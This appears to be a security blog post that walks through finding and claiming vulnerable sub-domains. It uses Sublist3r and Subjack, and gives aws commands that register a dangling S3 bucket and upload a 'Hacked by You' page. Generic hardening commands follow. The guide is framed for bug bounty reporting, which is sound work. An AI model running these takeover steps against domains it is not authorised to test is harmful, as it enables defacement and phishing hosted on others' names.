Sub-domain Takeover: A Practical Guide with Verified Commands

Listen to this Post

2025-02-12

Sub-domain takeover is a critical vulnerability that occurs when an attacker gains control over a sub-domain of a target domain. This usually happens when the sub-domain points to a service (like AWS S3, GitHub Pages, etc.) that has been deleted or unclaimed, allowing an attacker to claim it and host malicious content. Below is a step-by-step guide to identify and exploit sub-domain takeovers, along with verified commands and tools.

Step 1: Enumerate Sub-domains

To identify sub-domains, use tools like `Sublist3r` or Amass. These tools will help you gather a list of sub-domains associated with the target domain.


<h1>Install Sublist3r</h1>

git clone https://github.com/aboul3la/Sublist3r.git
cd Sublist3r
pip install -r requirements.txt

<h1>Run Sublist3r</h1>

python sublist3r.py -d example.com -o subdomains.txt

Step 2: Check for Sub-domain Takeover Vulnerabilities

Once you have a list of sub-domains, use tools like `Subjack` or `Takeover` to check for potential takeovers.


<h1>Install Subjack</h1>

go get github.com/haccer/subjack

<h1>Run Subjack</h1>

subjack -w subdomains.txt -t 100 -timeout 30 -o results.txt -ssl

Step 3: Verify the Takeover

If a sub-domain is vulnerable, you can claim it by hosting your own content on the service it points to. For example, if the sub-domain points to an AWS S3 bucket, you can create a bucket with the same name and host your content.


<h1>Example of hosting a static site on AWS S3</h1>

aws s3 mb s3://vulnerable-subdomain.example.com
aws s3 website s3://vulnerable-subdomain.example.com --index-document index.html
echo "Hacked by You" > index.html
aws s3 cp index.html s3://vulnerable-subdomain.example.com/

Step 4: Report the Vulnerability

If you’re performing this as part of a bug bounty program, make sure to report the vulnerability responsibly. Provide detailed steps to reproduce the issue and suggest remediation steps.

What Undercode Say

Sub-domain takeovers are a serious threat to organizations, as they can lead to phishing attacks, data breaches, and reputational damage. To mitigate this risk, organizations should regularly monitor their sub-domains and ensure that all services are properly configured and claimed. Below are some additional Linux commands and tools that can help in securing your infrastructure:

  • Nmap: Scan your network for open ports and services.
    nmap -sV -p 1-65535 example.com
    

  • Nikto: Web server vulnerability scanner.

    nikto -h example.com
    

  • Lynis: Security auditing tool for Unix/Linux systems.

    lynis audit system
    

  • Fail2Ban: Protect your server from brute-force attacks.

    sudo apt-get install fail2ban
    sudo systemctl enable fail2ban
    sudo systemctl start fail2ban
    

  • Cron Jobs: Regularly update your system and tools.

    (crontab -l ; echo "0 3 * * * apt-get update && apt-get upgrade -y") | crontab -
    

  • SSL/TLS Configuration: Ensure your web servers are using strong SSL/TLS configurations.

    sudo a2enmod ssl
    sudo systemctl restart apache2
    

  • Firewall Configuration: Use `ufw` to manage your firewall rules.

    sudo ufw allow 22/tcp
    sudo ufw enable
    

  • Log Monitoring: Regularly monitor your logs for suspicious activity.

    tail -f /var/log/auth.log
    

  • Backup: Regularly backup your critical data.

    tar -czvf backup.tar.gz /path/to/important/data
    

  • Security Headers: Implement security headers on your web servers.

    echo "Header set X-Content-Type-Options: nosniff" >> /etc/apache2/apache2.conf
    

By following these best practices and using the tools and commands mentioned above, you can significantly reduce the risk of sub-domain takeovers and other security vulnerabilities. Always stay updated with the latest security trends and continuously monitor your infrastructure for potential threats.

For more information on sub-domain takeovers, you can refer to the following resources:
OWASP Sub-domain Takeover
HackerOne Sub-domain Takeover Reports

Stay vigilant and keep your systems secure!

References:

Hackers Feeds, Undercode AIFeatured Image